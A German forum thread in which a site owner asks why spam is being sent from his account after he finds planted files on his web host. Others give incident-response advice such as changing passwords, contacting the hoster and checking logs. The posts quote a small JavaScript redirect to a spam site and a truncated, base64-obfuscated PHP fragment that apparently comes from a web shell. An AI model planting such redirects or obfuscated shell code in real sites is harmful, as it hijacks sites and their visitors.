gehackt?

[albert]

Hallo zusammen,
seit gestern erhalte ich viele Mails "Undelivered Mail Returned to Sender". Offenbar versendet jemand potenzmittel-Spammails von meinem account. In der mail ein link auf (meine Seite) http://www.albert-wilhelm.de/ [enfernt] .html
Die html-Datei ist mir völlig unbekannt, hab sie erstmal umbenannt. Drin steht:

Code: Select all

	<script>
		var aegj = "p";
		window.location.href = "http://tophot" + aegj + "rice.name/";
	</script>

Ich frage mich: Wie hat jemand diese html im root meiner Seite platzieren können?

PS: Klar werde ich passwörter ändern... aber beunruhigend isset schon

Nachtrag:
Hab noch eine [entfernt].php gefunden, wo haufenweise Zeugs drinsteht wie:

Code: Select all

$lb8GNaXS=array('3NjEwZDk2YTA5MDc5MDk0ZWVkIjsKJEdMT0JBTFNbJ2RlZmF1bHRfYWN0aW9u','J10gICAgICA9ICdTcWwnOwokR0xPQkFMU1snZGVmYXVsdF91c2VfYWpheCddICA');
$lFyE=YyG($lFyE, join('', $lb8GNaXS) );
$lFyE=YyG($lFyE,"gID0gdHJ1ZTsKJEdMT0

[olape]

Gehackt klingt plausibel.
Deine PW ändern ist die richtige Reaktion.

Bitte prüfe alle Software, soweit es geht, auf Aktualität!
Verständige den Hoster! Es muss nicht deine Schuld sein.
Bietet der Hoster einen Virenscanner, den du selber aktivieren kannst?

Möglicherweise kann die Schwachstelle aber auch bei deinen lokalen Geräten liegen.

Es kann aber auch gut sein, dass du gar nichts damit zu tun hast.

Du siehst, der Möglichkeiten gibt es viele. Du kannst nur versuchen, in Ruhe und mit System alles zu prüfen so weit es geht.

Beide Erfahrungen habe ich schon machen müssen.

Einmal eine Software (PHP) eingesetzt, die eine Lücke hatte. Da hat sich dann auch der Hoster / Virenscanner gemeldet.
Einmal wurde auf dem Server alle index.php aller gehosteten Webseiten ausgetauscht. In diesem Fall war also meinerseits kein Einfluss möglich.

[Holger]

Ich hab' erstmal den Link zur HTML-Datei entfernt. Wir wollen doch nicht noch zur Spam-Verbreitung beitragen.

Drin steht:

Das ist eine Umleitung zu einer in Rußland gehosteten Spam-Seite.

Hab noch eine [entfenrnt].php gefunden, wo haufenweise Zeugs drinsteht wie:

Vermutlich ist der PHP-Code nur base64 codiert.
Wäre mal interessant zu sehen, was drin steht. Vielleicht das Skript, das die Mails verschickt.

Hat der Hoster nicht Alarm geschlagen, wenn wirklich "haufenweise" Mails versendet wurden?

[albert]

den link entfernen wär nicht nötig gewesen, die datei gibt es nicht mehr, trotzdem danke.

Nein der Hoster hat nicht Alarm geschlagen, vielleicht waren es ja nich sooo viele. Bei mir sind halt ca. 20-30 als unzustellbar angekommen... und ich hoffe, dass damit erstmal gut ist.

Aber ich frage mich wie ist das passiert?

[cmb]

Aber ich frage mich wie ist das passiert?

Olaf hat ja bereits diverse Möglichkeiten genannt. Du könntest in den diversen Server-Logs mal nach verdächtigen Aktivitäten suchen – vielleicht findet sich ja etwas.

[Holger]

Aber ich frage mich wie ist das passiert?

Olaf hat ja bereits diverse Möglichkeiten genannt. Du könntest in den diversen Server-Logs mal nach verdächtigen Aktivitäten suchen – vielleicht findet sich ja etwas.

Oftmals kommt man ja nicht an alle Logs ran. Ich würde dem Hoster deshalb den Fall einfach mal schildern und um Hilfe bitten.

[olape]

Oftmals kommt man ja nicht an alle Logs ran. Ich würde dem Hoster deshalb den Fall einfach mal schildern und um Hilfe bitten.

Wahrscheinlich der beste Weg. Es sollte ja auch im Interesse des Hosters liegen, festzustellen wie das zustande gekommen ist.
Normalerweise kann der Hoster genau feststellen, wann und von wem (also welcher Benutzer) eine Datei erstellt wurde. Das würde schon ganz gut zeigen, wo möglicherweise eine Lücke ist.

[lck]

Hab noch eine [entfernt].php gefunden, wo haufenweise Zeugs drinsteht wie:

Sucht man nur nach $lb8GNaXS=array so findet man einen Link zu einem PHP-Decoder mit diesem Suchstring und auch deinen geposteten kompletten Code (ist ja nur ein Teil der Datei). Nur mit dem Decoding kann ich nichts anfangen.

Habe aber noch eine andere Datei gefunden, die auch diesen Code enthält, scheint etwas mit Wordpress zu tun zu haben, den Namen der Datei nach (den Namen poste ich mal nicht, bei Interesse bitte PN).

Ich würde die Webseite sicherheitshalber löschen und durch die lokale Kopie ersetzen, falls vorhanden. Falls keine vorhanden ist, wenigstens die Webseite komplett herunterladen und mit Antivirensoftware scannen. Alternativ mit diesem Online-Tool, da sieht es momentan gut aus.

[cmb]

Sucht man nur nach $lb8GNaXS=array so findet man einen Link zu einem PHP-Decoder mit diesem Suchstring und auch deinen geposteten kompletten Code (ist ja nur ein Teil der Datei). Nur mit dem Decoding kann ich nichts anfangen.

Das was ich unter ddecode.com/phpdecoder finde, ist nicht hilfreich, weil die Decodierung offensichtlich verfrüht abbrach.

Habe aber noch eine andere Datei gefunden, die auch diesen Code enthält, scheint etwas mit Wordpress zu tun zu haben, den Namen der Datei nach (den Namen poste ich mal nicht, bei Interesse bitte PN).

Würde ich mir gerne mal anschauen.

[albert]

Habe aber noch eine andere Datei gefunden, die auch diesen Code enthält

wo? auf meiner Seite oder irgendwo im Netz?

PS danke für die Tipps

Nachtrag: Ups, die o.g. html-Datei war plötzlich ein zweites Mal da, stand aber ein etwas anders href drin, ist also neu